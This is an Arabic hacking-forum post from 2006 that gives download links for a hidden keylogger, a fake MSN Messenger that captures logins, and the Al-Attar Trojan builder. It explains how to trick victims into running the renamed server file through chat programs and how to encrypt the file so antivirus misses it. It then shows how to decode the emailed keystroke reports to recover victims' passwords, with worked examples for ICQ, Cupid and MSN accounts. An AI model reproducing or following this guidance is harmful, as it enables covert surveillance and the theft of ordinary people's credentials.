زيـــــــــــــــــــــــــــ نت ــــــــــــــــــــــــــــاد

منتديات زياد نت للبرامج والتصميم والافلام والاغانى والاعلانات
 
الرئيسيةالبوابةمكتبة الصورس .و .جبحـثالتسجيلالأعضاءالمجموعاتدخول

شاطر | 
 

 هكر الثانى مرطبط بالاول

اذهب الى الأسفل 
كاتب الموضوعرسالة
zeyadnet

avatar

عدد الرسائل : 35
تاريخ التسجيل : 06/10/2006

مُساهمةموضوع: هكر الثانى مرطبط بالاول   الأحد أكتوبر 08, 2006 2:03 pm

البرنامج السادس :
اسم البرنامج tealth Key Logger
الحجم :
التحميل
:http://www.invisiblekeylogger.com/iksetup.exe
الشرح :
KeyLogger غير مرئي يعتبر كأقوى برامج سرقة KeyStorke
لاصطياد البرامج ,ينزل على Win من دون أن يشعر أحد بذلك وتشمل السرقة الخاصة بهذا البرنامج Usernames & Passwords وأيضا المنافذ النشطة ذو ملفات txt ويشمل AOL, YAHOO, ICQ, MSN , AIM.

البرنامج السابع :
اسم البرنامج :
Fake MSN Messenger Version 5.0
التحميل :
http://ym2400z.virtualave.net/cgi-b...s/msn/fmsn5.zip

هو نسخة مزيفة لبرنامج ام اس ان ميسينجر وكل ماعليك ان تقوم بارسال البرنامج للضحية ..وحينما يقوم بفتحه سيفتح له الميسينجر المزيف
والمتطابق مع الاصلي فى كل الوظائف سيقوم الضحية بادخال اليوزر نيم والباسورد فتظهر له رسالة خطا ومنها سيتم تسجيل كلمة السر فى جهازه بالمسار التالي:
C:\program files\folder.log
على هيئة ملف نصي يمكن قراءته بالنوت باد

وللحصول على الملف:
1- استخدام أي من برامج الروبوت السابقة التهيئة للحصول على مسار الملف.
2- ان يكون الضحية قد تم اختراقه من قبلك باحد برامج التروجان
وعجزت عن الحصول على باسورداته خاصة الكاش والتى يقوم الويندوز ا** بي بتشفيرها بدقة128 بت عالية التعقيد
والتى مازالت برامج التروجان لاتحل شفرتها
وبالتالي كل ماعليك خلال الاختراق ان تحصل على الملف من المسار المطلوب
3- ان يكون الجهاز فى متناول يدك مثل جامعة – صديق – عمل - ..
يلاحظ انه لمعرفة هل الميسينجر اصلي ام مزيف يتم كتابة اليوزر نبم about والباسورد fmsn
فاذا ظهرت لك الشاشة الموضحة عاليا المكتوب عليها fake msn فهو المزيف
وايضا المزيف به باج لم يتم حله وهو عدم امكانية عمل streching اي لايمكن تغيير نسب الميسينجر



اسم البرنامج :العطار (عربي )
الحجم : kb 241
التحميل : http://www.alattar.s5.com/attar.zip
او من هنا : http://www.h4palestine.com/download/attar.zip

الشرح :
افتح البرنامج ووو......شاهد الصور مع انها ما تحتاج لشرح

http://waleedessam80.malware-site.www/pas9.jpg

http://waleedessam80.malware-site.www/pas10.jpg

http://waleedessam80.malware-site.www/pas11.jpg

بعد صنع السيرفر راح تلقاه في سطح المكتب باسم RUNME
الان ستقوم بارساله الى الضحية قم بتغيير اسم الملف الى اى اسم مغرى وتقوم بارساله للضحية من خلال برامج الدردشة مثل
MSN MESSENGER او YAHOO MESSENGER او odigo او mirc
وهذا افضل من ارساله عن طريق الايميل لانه عالبا ما يفشل لان معظم سيرفرات الايميل لها انظمة حماية قوية يمكنها كشف السيرفر ولان هذه الطريقة تكون غير مقنعة للضحايا من جهة اخرى
يمكن للهاكر المحترفين ان يقوموا فبل ارسال السيرفر بضعطه حتى تقل مساحته او تشفيره حتى لا يكشفه الانتى فيرس
بعد ارسال الباتش كده انتهت مهمتك ولن يبقى سوى ان تتابع التقارير التى يرسلها السيرفرالى ايميلك من جهاز الضحية

التعامل مع التقارير الواردة :
+=-=-=-=-=-=-=-=+
التقارير او الرسائل الى راح يرسلها لك السيرفر ترسل من agent او العميل وعنوانه
"Agent" <billgates@microsoft.com>
اليك انت والذى تعتبر الرئيس

boss Boss" <president@whitehouse.gov>
وعنوانها Keyboard report from workstation 123.
اى تقرير المفاتيح التى استخدمها الضحية فهو عميل او جاسوس يعمل لحسابك فى جهاز الضحية دون علمه

يبدا التقرير بالاتى
اسم مستخدم الويندوز Windows user : Intel
رقم مسلسل التقرير Message number : 0012
البداية Startup
النهاية THE END

هذا التقرير يشتمل على ما يستخدمه الضحية من مفاتيح الكى بورد وبالتالى ما ستخدمه من برامج
وما دخله من مواقع وما يكتبه عند تسجيل الدخول فى المواقع والبرامج المحتلفة اى كلمات السر
والفت نظركم الى عدة ملاحظات هامة

Windows user : A
Message number : 0071
Startup.

[RSHIFT][ALT]jpdhjd g;l[ENTER][RSHIFT]ho,;l[ENTER]hg{kvhg

هذا البرنامج فى غاية الحساسية وهذا يميزه عن برامج اخرى جربتها قد يسقط منها بعض الحرووف التى كتبها الضحية سهوا
ولكن عند ضغط الضحية على المفتاح بشدة او لفترة طويلة قد يكرر الحرف للعديد من المرات وهذا يسهل ملاحظته

اذا كان الضحية يكتب بالعربى فراح تلاقى الحرووف غير متناسقة مثلا: v,lhksd
لو تحب تترجمها اكتبها فى المفكرة بعد التحول للغة العربية بنفس الترتييب تلاقيها: رومانسي

احيانا بعض المفاتيح ( وهى مفاتيح الوظائف ) تكتب باسمائها وليست كالرموز مثلا
[BCK] و [del] و [TAB] و [CTL] و [NUM]

ايضا الارقام التى يكتبها الضحية احيانا تكتب بطريقة مختلفة مثل الموجودة على يمين الكى بورد
0 = [INS]
1 = [END]
2 = [DN]
3 = [PGDN]
4 = [<-]
5 = e
6 = [->]
7 = [HOME]
8 = [UP]
9 = [PGup]

اما عن معرفة الباسورد
فمثلا اذا وجدت مثل هذا فى الرسالة فيعنى ان باسورد الا icq هى 300132776
@@ ICQ Registration @@
300132776

واذا وجدت هذا فاليوزر نيم لموقع cubid هو hiroman والباسورد w75ghu
@@ Welcome to Cupid - Microsoft Internet Explorer @@
hironman[ENTER][ENTER]
@@ Welcome to Cupid - Microsoft Internet Explorer @@
[ALT][LSHIFT]w75ghu,

اما الميسنجر وهو الاهم فالباسورد snowwhitelove123456
@@ Sign in to .NET Messenger Service - MSN Messenger @@
snowwhiteinlove[END][DN][PGDN][<-]e[->][ENTER]

غالبا ما تكون اول 3 او 4 رسائل كافية لمعرفة جميع باسوردات الضحية وقد لا تحتاج الباقون الا اذا كنت ترغب فى مراقبةالضحية بدقة وباستمرار
لذا فقد يزيد عدد الرسائل مما قد يسبب ازعاجا لك لذلك فانصح باستخدام خاصية ال JUNK MAIL
او الافضل على الاطلاق هو استخدام برنامج الاوت لوك اكبريس لتنقل اليه هذه الرسائل وتفحصها بدقة وانت غير متصل بالانترنت

اهم المزايا والعيوب :
======
واهم ميزات البرنامج انه يمكن من خلال التقارير الواردة معرفة جميع الباسوردات لدى الضحية
حتى الغير مخزنة بالجهاز وهذا ما تعجز عنه جميع برامج الاختراق الاخرى

ويعيبه ان السيرفر يكتشفه الانتى فيرس (ولكن يمكن تشفيره)
كما انه يعمل فى الخلفية اى بالضغط على CTL+ALT+DEL يظهر البرنامج ضمن البرامج العاملة حاليا
وبالتالى قد يكتشفه الضحية ان كان على درجة فائقة من الذكاء وهذا لا يحدث لانه لو كان كذلك لما تم اختراقه من البداية
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو
 
هكر الثانى مرطبط بالاول
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
زيـــــــــــــــــــــــــــ نت ــــــــــــــــــــــــــــاد :: منتدى عمالقة الهكرز-
انتقل الى: